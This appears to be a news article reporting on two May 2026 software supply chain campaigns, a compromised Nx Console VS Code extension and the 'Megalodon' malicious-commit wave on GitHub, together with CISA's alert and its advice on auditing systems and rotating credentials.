A series of sophisticated supply chain attacks has heightened alert levels among millions of software developers. These attacks involve the misuse of everyday developer tools to steal credentials, cloud tokens, and source code, posing a significant threat to trusted systems.
Developer Tools: A New Target for Cyber Threats
The alarming aspect of these campaigns is their exploitation of systems that developers inherently trust, such as editors, automated pipelines, and version control workflows. In some instances, malware infiltrates developer machines without any user interaction, raising serious security concerns.
Two interconnected campaigns exemplify this threat. The first involved a compromised version of the popular Nx Console VS Code extension, version 18.95.0, which was distributed on the Visual Studio Code Marketplace on May 18, 2026. With over 2.2 million installations, the impact was immediate and widespread, including unauthorized access to approximately 3,800 internal GitHub repositories.
CISA’s Response to the Supply Chain Attacks
The Cybersecurity and Infrastructure Security Agency (CISA) has been instrumental in identifying the scope of these threats. On May 28, 2026, CISA issued an urgent alert highlighting the targeting of CI/CD pipelines, code extensions, and cloud environments. The malicious extension has been assigned CVE-2026-48027 and added to CISA’s Known Exploited Vulnerabilities catalog.
Organizations using the compromised extension are advised to consider their machines fully compromised. CISA recommends a thorough audit of workflow files and a complete forensic review of CI/CD logs and cloud audit trails for any affected entities.
Insight into the Megalodon Campaign
The second campaign, dubbed “Megalodon,” took place concurrently. It involved the mass distribution of 5,718 malicious commits to 5,561 public GitHub repositories within a six-hour period. These commits included GitHub Actions workflows that harvested sensitive data including CI/CD secrets, cloud credentials, and SSH keys.
The attackers initially gained access by stealing a contributor’s GitHub personal access token, planting a hidden orphan commit in the nrwl/nx GitHub repository with a 498 KB obfuscated JavaScript payload. They then published the malicious extension to the VS Code Marketplace using stolen credentials.
Once installed, the compromised extension silently executed a payload that harvested sensitive credentials and installed a Python backdoor on macOS, making detection challenging with standard security measures.
Mitigation and Future Outlook
In response to these threats, CISA advises organizations to audit their systems for suspicious activity, especially changes made after May 18, 2026, by automated accounts. Comprehensive reviews of CI/CD logs and cloud audit trails are recommended, along with the rotation of all access credentials.
As attacks on software delivery pipelines become more prevalent, it is crucial for organizations to enhance their security protocols and remain vigilant against such threats. Implementing robust security measures and keeping systems up to date are essential steps in safeguarding against future attacks.
